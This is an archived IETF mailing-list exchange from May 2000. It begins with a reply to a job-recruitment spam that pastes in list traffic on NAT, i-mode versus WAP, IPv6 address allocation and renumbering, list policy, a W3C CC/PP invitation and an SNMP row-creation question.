In message <[EMAIL PROTECTED]>,
"mark.paton" writes:
>
>Forgive this spam, but I am looking for 7 CCIE's
>for locations in London, Silicon Valley,
>California and Tokyo. Anyone interested please
>email me back and I will forward your details to
>HR.
This is an inappropriate message for this mailing list. If you'd
like to see the kinds of messages that are appropriate, here's
the archive of traffic for the last month:
>From owner-ietf-outbound Mon May 1 04:51:53 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA22260
for [EMAIL PROTECTED]; Mon, 1 May 2000 04:50:02 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA22234
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 04:44:39 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id RAA11363; Mon, 1 May 2000 17:42:00 +0900
Subject: Re: draft-ietf-nat-protocol-complications-02.txt
In-Reply-To: <[EMAIL PROTECTED]> from "vinton
g. cerf" at "Apr 30, 2000 06:20:48 am"
To: "vinton g. cerf" <[EMAIL PROTECTED]>
Date: Mon, 1 May 2000 17:42:00 +0859 ()
CC: Matt Holdrege <[EMAIL PROTECTED]>,
Thomas Narten <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Vint;
> that's right - they use iMODE on the DOCOMO mobiles. iMODE and
> WAP seem to have that in common: a non-IP radio link protocol
> and an application gateway. Of course, this limits the applications
> to those that can be "translated" in the gateway, while an end to
> end system (such as the Ricochet from Metricom) would allow
> essentially any application on an Internet server to interact
> directly with the mobile device because the gateway would merely
> be an IP level device, possibly with NAT functionality.
> With a JAVA interpreter or other similar capability in the
> mobile, one could imagine considerable competition for development
> of new applications. As it stands, only the applications NTT
> chooses to implement in the translating gateway are accessible.
An interesting thing is that iMODE is so successful that DOCOMO
is suffering from the usual problems (lack of scalability and
robustness) caused by violating the end to end principle.
iMODE is now infamous for its frequent service interruption.
DOCOMO users are refunded for the interruption.
> Since HTTP is one of the "applications" served, there is still
> a lot of room for competition, I suppose.
To make the competition fair, the important questions are:
Is it fair if providers using iMODE or WAP are advertised
to be ISPs?
Is it fair if providers using NAT are advertised to be ISPs?
My answer to both questions is
No, while they may be Internet Service Access Providers and
NAT users may be IP Service Providers, they don't provide
Internet service and are no ISPs.
Any oppositions?
Masataka Ohta
>From owner-ietf-outbound Mon May 1 07:01:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA23645
for [EMAIL PROTECTED]; Mon, 1 May 2000 07:00:02 -0400 (EDT)
Received: from bells.cs.ucl.ac.uk (bells.cs.ucl.ac.uk [128.16.5.31])
by ietf.org (8.9.1a/8.9.1a) with SMTP id GAA23594
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 06:57:19 -0400 (EDT)
Received: from cs.ucl.ac.uk by bells.cs.ucl.ac.uk with local SMTP
id <[EMAIL PROTECTED]>; Mon, 1 May 2000 11:55:51 +0100
To: Masataka Ohta <[EMAIL PROTECTED]>
cc: "vinton g. cerf" <[EMAIL PROTECTED]>, Matt Holdrege <[EMAIL PROTECTED]>,
Thomas Narten <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
[EMAIL PROTECTED]
Subject: Re: draft-ietf-nat-protocol-complications-02.txt
In-reply-to: Your message of "Mon, 01 May 2000 17:42:00 +0859."
<[EMAIL PROTECTED]>
Date: Mon, 01 May 2000 11:55:50 +0100
Message-ID: <[EMAIL PROTECTED]>
From: Jon Crowcroft <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Masataka Ohta ty
ped:
>> Is it fair if providers using iMODE or WAP are advertised
>> to be ISPs?
>>
>> Is it fair if providers using NAT are advertised to be ISPs?
>>
>>My answer to both questions is
>>
>> No, while they may be Internet Service Access Providers and
>> NAT users may be IP Service Providers, they don't provide
>> Internet service and are no ISPs.
i agree:
in the UK, i would say that someone claiming internet access via WAP
would be in breach of the trades description act.
>>Any oppositions?
not from here (for wap - i dont know enough about iMODE to comment)
>> Masataka Ohta
>>
cheers
jon
>From owner-ietf-outbound Mon May 1 12:51:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA29994
for [EMAIL PROTECTED]; Mon, 1 May 2000 12:50:02 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA29925
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 12:45:34 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id BAA12661; Tue, 2 May 2000 01:41:02 +0900
Subject: Re: draft-ietf-nat-protocol-complications-02.txt
In-Reply-To: <[EMAIL PROTECTED]> from "Shaw,
Robert" at "May 1, 2000 11:35:53 am"
To: "Shaw, Robert" <[EMAIL PROTECTED]>
Date: Tue, 2 May 2000 01:41:01 +0859 ()
CC: "'vinton g. cerf'" <[EMAIL PROTECTED]>, Matt Holdrege <[EMAIL PROTECTED]>,
Thomas Narten <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Robert;
> WAP and i-mode are *very* different.
FTP and SMTP are *very* different, because SMTP is a lot easier to
pass application/transport gateways.
However, the question of whether it is IP or not is enough to dismiss
iMODE and WAP.
The battle has been and still is fought between the end to end
Internet and intelligent telephone network.
NAT was merely an interim solution for telephone network people
until they are ready with non-IP protocols of iMODE or WAP.
Now, the option is between the stupid Internet with global IP
connectivity and the telephony based intelligent non-IP network
with a lot of application/transport gateways.
There is no ecological niche for intelligent IP network with
a lot of application/transport gateways (NAT), any more.
> i-mode uses native
> http servers with some relatively transparent html
> extensions for handsets (such as <a AccessKey="1" href="...).
For IP community, it means that iMODE is worse than WAP.
For IP community, SMTP is worse than FTP, because SMTP is more
application/transport gateway friendly than FTP.
It is regrettable that some IETF WGs have damaged the Internet trying
to make application/transport layer protocols unnecessarily complex
to be NAT and/or non-IP protocol friendly.
Masataka Ohta
>From owner-ietf-outbound Mon May 1 14:41:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA02248
for [EMAIL PROTECTED]; Mon, 1 May 2000 14:40:02 -0400 (EDT)
Received: from localhost.localdomain ([216.52.68.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA02000
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 14:31:48 -0400 (EDT)
Received: from ecal.com (localhost [127.0.0.1])
by localhost.localdomain (8.9.3/8.9.3) with ESMTP id OAA29610
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 14:30:55 -0400
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 01 May 2000 14:30:54 -0400
From: John Stracke <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (X11; U; Linux 2.2.14-5.0 i586)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Re: draft-ietf-nat-protocol-complications-02.txt
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Masataka Ohta wrote:
> > i-mode uses native
> > http servers with some relatively transparent html
> > extensions for handsets (such as <a AccessKey="1" href="...).
>
> For IP community, it means that iMODE is worse than WAP.
I'm not sure that's the case. It sounds like it's easy to develop a Web
site that works both on i-mode and on a standard Web browser; that means
that a site that wants to support i-mode doesn't have to drain off
effort that could otherwise go into improving the site. Further, since
the site has only one codebase, it probably has only one set of security
holes, rather than two. Both of these are an improvement over WAP. The
extra bandwidth that the IP endpoints spend on sending the AccessKey
attribute is regrettable, but probably less of a loss than the
development effort of a dual-mode site.
Didn't someone from DOCOMO present in Adelaide, and say they were
planning to go to running IP in the handsets?
--
/==============================================================\
|John Stracke | http://www.ecal.com |My opinions are my own.|
|Chief Scientist |=============================================|
|eCal Corp. |"If nobody believes what I say, I feel |
|[EMAIL PROTECTED]|ineffective." "Oh, I don't believe that." |
\==============================================================/
>From owner-ietf-outbound Mon May 1 15:21:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA03647
for [EMAIL PROTECTED]; Mon, 1 May 2000 15:20:02 -0400 (EDT)
Received: from mail-gw.hursley.ibm.com (mail-gw.hursley.ibm.com [194.196.110.15])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA03494
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 15:14:26 -0400 (EDT)
Received: from sp3at21.hursley.ibm.com (sp3at21.hursley.ibm.com [9.20.45.21]) by
mail-gw.hursley.ibm.com (AIX4.3/UCB 8.8.8/8.8.8) with ESMTP id UAA46770; Mon, 1 May
2000 20:13:51 +0100
Received: from hursley.ibm.com (gsine02.us.sine.ibm.com [9.14.6.42]) by
sp3at21.hursley.ibm.com (AIX4.2/UCB 8.7/8.7.3) with ESMTP id UAA23402; Mon, 1 May 2000
20:13:48 +0100 (BST)
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 01 May 2000 13:55:42 -0500
From: Brian E Carpenter <[EMAIL PROTECTED]>
Organization: IBM
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en,fr
MIME-Version: 1.0
To: Sean Doran <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: runumbering (was: Re: IPv6: Past mistakes repeated?)
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Sean Doran wrote:
>
> Thomas Narten writes:
>
> | Actually, if your assumption is that NATv6 is better than IPv6 with
> | renumbering, then IPv4 and NATv4 was good enough to start with and
> | there was need to move to IPv6 in the first place.
> ^
> no (right? maybe this is where the previous "not" came from -:) )
>
> Did you see Noel's excellent observation that the problem with
> NAT is architectural and not mechanical? The architectural problem:
> more things to address on one side of the NAT than there are addresses
> on the other side of the NAT.
>
> IPv6 does bring *ONE* thing significantly different from IPv4:
> lots of address space. So much, that we do not obviously need to
> have situations where there is an addressability mismatch on any
> side of a NAT.
>
> NATv6 therefore does not suffer the architectural flaw that
> causes him to have real problems with NAT, although it can
> suffer many of the mechanical problems, particularly if IPv6
> deliberately seeks to worsen the mechanical difficulties of NATv6.
>
> This allows for the architectural features of NAT to be
> less awkwared to exploit.
>
> | But if NATv4 doesn't cut it, I don't see how NATv6 between IPv6
> | sites cuts it either.
>
> I hope this makes it clearer for you.
Given that we still don't have a global namespace available except
for NAT-free IPv6, it doesn't, since such a namespace is well
known to be required to avoid the "mechanical" problems with NAT.
So the problem Paul originally set us remains: we need to make IPv6
renumbering less painful that managing a NATted address space.
Brian
>From owner-ietf-outbound Mon May 1 15:43:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA04165
for [EMAIL PROTECTED]; Mon, 1 May 2000 15:42:10 -0400 (EDT)
Received: from mail-gw.hursley.ibm.com (mail-gw.hursley.ibm.com [194.196.110.15])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA04016
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 15:35:47 -0400 (EDT)
Received: from sp3at21.hursley.ibm.com (sp3at21.hursley.ibm.com [9.20.45.21]) by
mail-gw.hursley.ibm.com (AIX4.3/UCB 8.8.8/8.8.8) with ESMTP id UAA26336; Mon, 1 May
2000 20:35:17 +0100
Received: from hursley.ibm.com (gsine02.us.sine.ibm.com [9.14.6.42]) by
sp3at21.hursley.ibm.com (AIX4.2/UCB 8.7/8.7.3) with ESMTP id UAA20236; Mon, 1 May 2000
20:35:15 +0100 (BST)
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 01 May 2000 14:15:55 -0500
From: Brian E Carpenter <[EMAIL PROTECTED]>
Organization: IBM
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en,fr
MIME-Version: 1.0
To: Mathis Jim-AJM005 <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED]
Subject: IPv6: Past discussions repeated?
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Jim,
You make a good point. We have discussed this at length, as
Steve Bellovin described, during the original IPng debate.
Now is the time to deploy, not to discuss. It's hard to find
leadership in a herd of cats, but we have stable standards,
multiple products available or announced, and the IPv6 Forum
to provide the focus. Let's go do it.
Brian
Mathis Jim-AJM005 wrote:
>
> A brief history lesson...
>
> There was some concern about a 32-bit address space. MIT-LCS
> proposed 48 (or 64-bit) addresses but that was coupled with a
> reduction of the TCP sequence number to 16 bits. After some
> discussion, we settled on 32-bits based on the computing
> resources available at the time. At that time, there was no
> separate IP header, only addressing fields in the TCP header.
>
> Around that time, the ARPANET had recently scaled up from
> 8-bit host addresses to 24-bits. Seemed unlikely that anyone
> would build more than 100 ARPANET-sized networks with its huge
> IMPs and PDP-10 mainframe computers (and UCLA's 360). 48-bit
> Ethernet addressing wasn't around yet; otherwise we probably
> would have picked 64 bits just to not have to deal with ARP.
> This was before Moore's law; Intel had just released the
> 8008 microprocessor. There were less than 100,000 large
> commercial buildings (>500,000 sq. ft) in the world; seemed
> that the number of class-c addresses were sufficient. For
> better or worse, the size of the address field went unchanged
> from the original version of TCP (before IP was a separate
> header).
>
> We were caught short by a technology paradigm shift coming
> from semiconductor physics. If computers rode the same
> technology advancement curve as cars, we wouldn't be having
> an address space problem now.
>
> We cannot predict the next big technology paradigm shift.
> The real lesson to learn from IPv4 - IPv6 (which I think
> was described by Knuth in regards to conversion of computer
> instruction sets but I can't find the reference) is the
> cost of delaying conversion. For the longer you delay
> the inevitable, the more installed base you have to
> convert and the exponentially higher the resulting cost.
>
> The excellent engineering to keep v4 running was too good
> and has slowed the inevitable movement to larger address
> spaces. While there are no guarantees that 128-bits won't
> be exhausted sometime in the future, we do know a lot more
> about address space management and allocation than when Jon
> started handing out net numbers. The Internet has always
> been a balancing act between being ready for the future
> and getting something working today. IPv6 will not change
> this, so we need to be prepared for change. The next "big"
> problem facing the Internet that will require a broad-scale
> swap-out of software probably won't be address-space related.
>
> We need to move forward with IPv6 both by deploying it in
> the "core" and setting a time-frame after which non-IPv4
> compatible addresses will be assigned. Unless there is a
> clear reason to move, no one wants to change software just
> to change. Once IPv6 is in the major backhaul carriers, ISPs
> can role out improved services based on IPv6 which will be
> the real reason end-users upgrade. Seems like a real
> leadership vacuum here...
>
> Jim
>
> > -----Original Message-----
> > From: Keith Moore [mailto:[EMAIL PROTECTED]]
> > Sent: Monday, April 24, 2000 2:36 PM
> > To: Anthony Atkielski
> > Cc: [EMAIL PROTECTED]
> > Subject: Re: IPv6: Past mistakes repeated?
> >
> >
> > > What I find interesting throughout discussions that mention
> > IPv6 as a
> > > solution for a shortage of addresses in IPv4 is that people see the
> > > problems with IPv4, but they don't realize that IPv6 will
> > run into the
> > > same difficulties. _Any_ addressing scheme that uses addresses of
> > > fixed length will run out of addresses after a finite
> > period of time,
> >
> > I suppose that's true - as long as addresses are consumed at a rate
> > faster than they are recycled. But the fact that we will run out of
> > addresses eventually might not be terribly significant - the Sun will
> > also run out of hydrogen eventually, but in the meantime we still find
> > it useful.
> >
> > > and that period may be orders of magnitude shorter than anyone might
> > > at first believe.
> >
> > it is certainly true that without careful management IPv6 address
> > space could be consumed fairly quickly. but to me it looks like that
> > with even moderate care IPv6 space can last for several tens of years.
> >
> > > Consider IPv4. Thirty-two bits allows more than four billion
> > > individual machines to be addressed.
> >
> > not really. IP has always assumed that address space would be
> > delegated in power-of-two sized "chunks" - at first those chunks only
> > came in 3 sizes (2**8, 2**16, or 2**24 addresses), and later on it
> > became possible to delegate any power-of-two sized chunk. but even
> > assuming ideally sized allocations, each of those chunks would on
> > average be only 50% utilized.
> >
> > so every level of delegation effectively uses 1 of those 32 bits, and
> > on average most parts of the net are probably delegated 4-5 levels
> > deep. (IANA/regional registry/ISP/customer/internal). so we end up
> > effectively not with 2**32 addresses but with something like 2**27 or
> > 2**28. (approximately 134 million or 268 million)
> >
> > (see also RFC 1715 for a different analysis, which when applied to
> > IPv4, yields similar results for the optimistic case)
> >
> > allocating space in advance might indeed take away another few bits.
> > but given the current growth rate of the internet it is necessary.
> > the internet is growing so fast that a policy of always allocating
> > only the smallest possible chunk for a net would not only be
> > cumbersome, it would result in poor aggregation in routing tables and
> > quite possibly in worse overall utilization of address space.
> >
> > but if it someday gets easier to renumber a subnet we might then find
> > it easier to garbage collect, and recycle, fragmented portions of
> > address space. and if the growth rate slowed down (which for various
> > reasons is possible) then we could do advance allocation more
> > conservatively.
> >
> > > It should be clear that IPv6 will have the same problem. The space
> > > will be allocated in advance. Over time, it will become
> > obvious that
> > > the original allocation scheme is ill-adapted to changing
> > requirements
> > > (because we simply cannot foresee those requirements). Much, _much_
> > > sooner than anyone expects, IPv6 will start to run short of
> > addresses,
> > > for the same reason that IPv4 is running short. It seems impossible
> > > now, but I suppose that running out of space in IPv4 seemed
> > impossible
> > > at one time, too.
> >
> > IPv6 allocation will have some of the same properties of IPv4
> > allocation. We're still using power-of-two sized blocks, we'll still
> > waste at least one bit of address space per level of delegation. It
> > will probably be somewhat easier to renumber networks and recycle
> > address - how much easier remains to be seen.
> >
> > OTOH, I don't see why IPv6 will necessarily have significantly more
> > levels of assignment delegation. Even if it needs a few more levels,
> > 6 or 7 bits out of 128 total is a lot worse than 4 or 5 bits
> > out of 32.
> >
> > > The allocation pattern is easy to foresee. Initially, enormous
> > > subsets of the address space will be allocated carelessly and
> > > generously, because "there are so many addresses that we'll
> > never run
> > > out"
> >
> > I don't know where you get that idea. Quite the contrary, the
> > regional registries seem to share your concern that we will use up
> > IPv6 space too quickly and *all* of the comments I've heard about the
> > initial assignment policies were that they were too conservative.
> > IPv6 space does need to be carefully managed, but it can be doled out
> > somewhat more generously than IPv4 space.
> >
> > > and because nobody will want to expend the effort to achieve
> > > finer granularity in the face of such apparent plenty.
> >
> > First of all, having too fine a granularity in allocation prevents you
> > from aggregating routes. Second, with power-of-two sized allocations
> > there's a limit to how much granularity you can get - even if you
> > always allocate optimal sized blocks.
> >
> > > This mistake will be repeated for each subset of the address space
> > > allocated, by each organization charged with allocating the space.
> >
> > It's not clear that it's a mistake. it's a tradeoff between having
> > aggregatable addresses and distributed assignment on one hand and
> > conserving address space on the other. and the people doing address
> > assignment these days are quite accustomed to thinking in these terms.
> >
> > > If you need further evidence, look at virtual memory address spaces.
> > > Even if a computer's architecture allows for a trillion bits of
> > > addressing space, it invariably becomes fragmented and
> > exhausted in an
> > > amazingly short time.
> >
> > this is only amazing to those who haven't heard of Moore's law.
> > (presumably the same set of people who thought DES would
> > never be broken)
> >
> > on the other hand, it's not clear how valid this analogy is for
> > predicting the growth of the Internet - just because Moore's law (if
> > it keeps on working) might predict that in a decade we could
> > eventually have thousands of network-accessible computing devices for
> > everyone on the planet, doesn't mean that those people would be able
> > to deal with thousands of such devices. and there do appear to be
> > limits to the number of human beings that the planet can support. and
> > if by that time the robot population exceeds the human population then
> > I'm happy to let the robots solve the problem of upgrading to a new
> > version of IP.
> >
> > and as for other planets, all kinds of assumptions about the current
> > Internet fail when you try to make it work at interplanetary
> > transmission latencies. so if we do manage to significantly populate
> > other planets or if we find extraterrestrial species that we want to
> > network with, we'll have to build a new architecture. and people are
> > already working on that.
> >
> > > The only real solution to this is an open-ended addressing
> > scheme--one
> > > to which digits can be added as required.
> >
> > variable length addresses do have some nice properties. there are
> > also some drawbacks.
> >
> > fwiw, phone numbers do in fact have a fixed maximum length which is
> > wired into devices all over the planet - not just in the phone system
> > but in numerous computer databases, etc.. it is not much easier to
> > increase the overall length of phone numbers than it is to make IP
> > addresses longer. and once you set a fixed maximum length then it's
> > just a matter of representation - do you have a variable-length
> > address field or do you have a fixed-length field with zero padding?
> > fixed-length fields are a lot easier for routers to deal with. (and
> > for similar reasons a lot of software uses fixed-length fields for
> > phone numbers)
> >
> > 128-bit IPv6 addresses are roughly equivalent to 40 digits, which IIRC
> > is a lot longer than the maximum size of a phone number under E.164.
> > (sorry, I don't have a copy handy to check)
> >
> > and the means by which IPv6 addresses are being allocated is actually
> > not so different from the means in which phone numbers are allocated -
> > the major exception being that IPv6 prefixes are assigned to major
> > ISPs rather than to geographic regions. (the latter difference might
> > affect routing but probably does not affect allocation efficiency).
> >
> > so I think the bottom line answer to your message is that your concers
> > are valid (if perhaps a bit exaggerated) and an allocation mechanism
> > similar to what you suggest is already in place.
> >
> > Keith
> >
>From owner-ietf-outbound Mon May 1 16:21:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA05085
for [EMAIL PROTECTED]; Mon, 1 May 2000 16:20:03 -0400 (EDT)
Received: from CNRI.Reston.VA.US (localhost [127.0.0.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA04944
for <[EMAIL PROTECTED]>; Mon, 1 May 2000 16:12:53 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
From: The IETF Secretariat <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: IETF List maintenance
Reply-to: [EMAIL PROTECTED]
Date: Mon, 01 May 2000 16:12:52 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
To remove yourself from the IETF discussion list, send a message to
[EMAIL PROTECTED]
Enter just the word unsubscribe in the body of the message.
NOTE: List requests do not take effect until the next day, and there
are always messages in the outbound queue. As such, you may
continue receiving messages for a short while after successfully
unsubscribing from the list.
The IETF discussion list serves two purposes. It furthers the
development and specification of Internet technology through discussion
of technical issues. It also hosts discussions of IETF direction,
policy, and procedures. As this is the most general IETF mailing list,
considerable latitude is allowed. Advertising, whether to solicit
business or promote employment opportunities, falls well outside the
range of acceptable topics, as do discussions of a personal nature.
This list is meant for initial discussion only. Discussions that fall
within the area of any working group or well established list should be
moved to such more specific forum as soon as this is pointed out,
unless the issue is one for which the working group needs wider input
or direction.
In addition to the topics noted above, appropriate postings include:
o Last Call discussions of proposed protocol actions
o Discussion of technical issues that are candidates for IETF work, but
do not yet have an appropriate e-mail venue
o Discussion of IETF administrative policies
o Questions and clarifications concerning IETF meetings.
Inappropriate postings include:
o Unsolicited bulk e-mail
o Discussion of subjects unrelated to IETF policy, meetings,
activities, or technical concerns
o Unprofessional commentary, regardless of the general subject.
The IETF Chair, the IETF Executive Director, or a sergeant-at-arms
appointed by the Chair is empowered to restrict posting by a person or
of a thread as they deem appropriate to limit abuse. Complaints
regarding their decisions should be referred to the IAB <[EMAIL PROTECTED]>
>From owner-ietf-outbound Tue May 2 16:31:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA08424
for [EMAIL PROTECTED]; Tue, 2 May 2000 16:30:01 -0400 (EDT)
Received: from tux.w3.org (IDENT:[EMAIL PROTECTED] [18.29.0.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA08226;
Tue, 2 May 2000 16:22:17 -0400 (EDT)
Received: from rupert (IDENT:root@localhost [127.0.0.1])
by tux.w3.org (8.9.3/8.9.3) with SMTP id QAA09685;
Tue, 2 May 2000 16:21:52 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Tue, 02 May 2000 16:20:25 -0400
To: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED]
From: Johan Hjelm <[EMAIL PROTECTED]>
Subject: Invitation: CC/PP Protocol Discussion List
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Dear All,
as you may know, we designed the CC/PP Exchange Protocol to take care of
the interchange of CC/PP data structures between an HTTP client and a HTTP
server. In the current version it is an application of the HTTP Extension
Protocol.
That, and the fact that it is only a Note in the W3C (a document without
official standing) makes its status somewhat insecure. We want to
investigate the possibilities of bringing it onto the standards track, and
as a first step, we have created a version of the specification in the RFC
format as focal point for discussion.
The address of the list is [EMAIL PROTECTED] You subscribe by
sending an email to [EMAIL PROTECTED] with the word
"subscribe" in the subject of the message (without the quotes).
We hope interested parties will participate in the discussion on this list
to establish a more formal version of this protocol.
Welcome!
Johan Hjelm
Chair, CC/PP working group, W3C
(apologies for multiple postings!)
For more information:
CC/PP Exchange Protocol as a W3C Note: http://www.w3.org/TR/NOTE-CCPPexchange
CC/PP Exchange Protocol in RFC format:
http://lists.w3.org/Archives/Public/www-ccpp-protocol/2000Apr/att-0001/01-dr
aft-ietf-ohto-ccpp-exchange-00.txt
CC/PP original W3C Note: http://www.w3.org/TR/NOTE-CCPP/
CC/PP working group public home page: http://www.w3.org/Mobile/CCPP/
************************************************************
Johan HJELM
Ericsson Research, User Applications Group
Currently visiting engineer at the W3C
Chair, CC/PP Working Group and WCA Interest Group
The World Wide Web Consortium
[EMAIL PROTECTED]
http://www.w3.org/People/W3Cpeople.html#Hjelm
Fax +1-617-258 5999, Phone +1-617-253-9630
MIT/LCS, 545 Tech. Sq. Cambridge MA 02139 USA
Opinions are personal, always my own,
and not necessarily those of Ericsson or the W3C.
============================================================
>From owner-ietf-outbound Thu May 4 02:21:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA29930
for [EMAIL PROTECTED]; Thu, 4 May 2000 02:20:02 -0400 (EDT)
Received: from wiproecmx2.wipro.com ([164.164.31.6])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA29907
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 02:17:39 -0400 (EDT)
Received: from ecvwall1.wipro.com (ecvwall1.wipro.com [192.168.181.23])
by wiproecmx2.wipro.com (8.9.3/8.9.3) with SMTP id LAA15641
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 11:55:34 GMT
Received: from wipro.com ([192.168.178.17]) by ecmail.wipsys.soft.net
(Netscape Messaging Server 3.6) with ESMTP id AAA306A;
Thu, 4 May 2000 11:41:36 +0530
Message-ID: <[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 11:50:28 +0530
From: "Shivendra Kumar" <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
Organization: Wipro Technologies
X-Mailer: Mozilla 4.6 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
CC: Sanjay Gera <[EMAIL PROTECTED]>,
Shivendra Kumar <[EMAIL PROTECTED]>,
Ram Durai <[EMAIL PROTECTED]>,
Sreedhar J K <[EMAIL PROTECTED]>,
Abhishek Bagchi <[EMAIL PROTECTED]>,
Amit Srivastava <[EMAIL PROTECTED]>
Subject: query on SNMP set PDU and row creation mechanism
Content-Type: multipart/mixed;
boundary="------------1D6A63C3351EE5FED646B54F"
X-Loop: [EMAIL PROTECTED]
This is a multi-part message in MIME format.
--------------1D6A63C3351EE5FED646B54F
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi ,
This is Shivendra and I am working on SNMP interfaces for a optical
network NE.
We are providing row creation mechanism on SNMP tables using SMI v2
directives( using
RowStatus). In the Set Pdu , we want to allow the requests for
multiple row creations over
same/different tables. We would like to know how this is being done by
people who have already
implemented Set command support . So, we have basically three
questions:
1. How can multiple row creation request in a single Set PDU be handled?
2. How would we enable multiple row creation over different tables , if
the tables are dependent
on each other?
3. Is it a good practice to allow multiple row creation request for
same/different tables thru
one Set PDU?
regards,
shivendra
--
------------------------------------------------------------------------
Shivendra Kumar
22, 8th Main, Wipro Infotech- Telecom Sols.
1st Cross, 72, Electronics City
Maruthi HBCS, Bangalore
BTM Layout 1st Stage,
B'lore
mobile-98440-92528 hello(off) -0091-80-8520408/420 extn.
2108
fax- 0091-80-8520478
mail@ - [EMAIL PROTECTED]
------------------------------------------------------------------------
My three warriors - perseverance, smile and hope.
------------------------------------------------------------------------
--------------1D6A63C3351EE5FED646B54F
Content-Type: text/x-vcard; charset=us-ascii;
name="shivendra.kumar.vcf"
Content-Description: Card for Shivendra Kumar
Content-Disposition: attachment;
filename="shivendra.kumar.vcf"
Content-Transfer-Encoding: 7bit
begin:vcard
n:Kumar;Shivendra
tel;cell:98440-92528
tel;work:0091-80-8520420 extn 2107
x-mozilla-html:FALSE
org:Wipro Technologies;Telecom Solutions
version:2.1
email;internet:[EMAIL PROTECTED]
title:Systems Manager
adr;quoted-printable:;;72, Keonics Electronics city =0D=0AHosur Main
Road,=0D=0ABangalore- 561229;Bangalore;;;India
fn:Shivendra Kumar
end:vcard
--------------1D6A63C3351EE5FED646B54F--
>From owner-ietf-outbound Thu May 4 04:40:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA01102
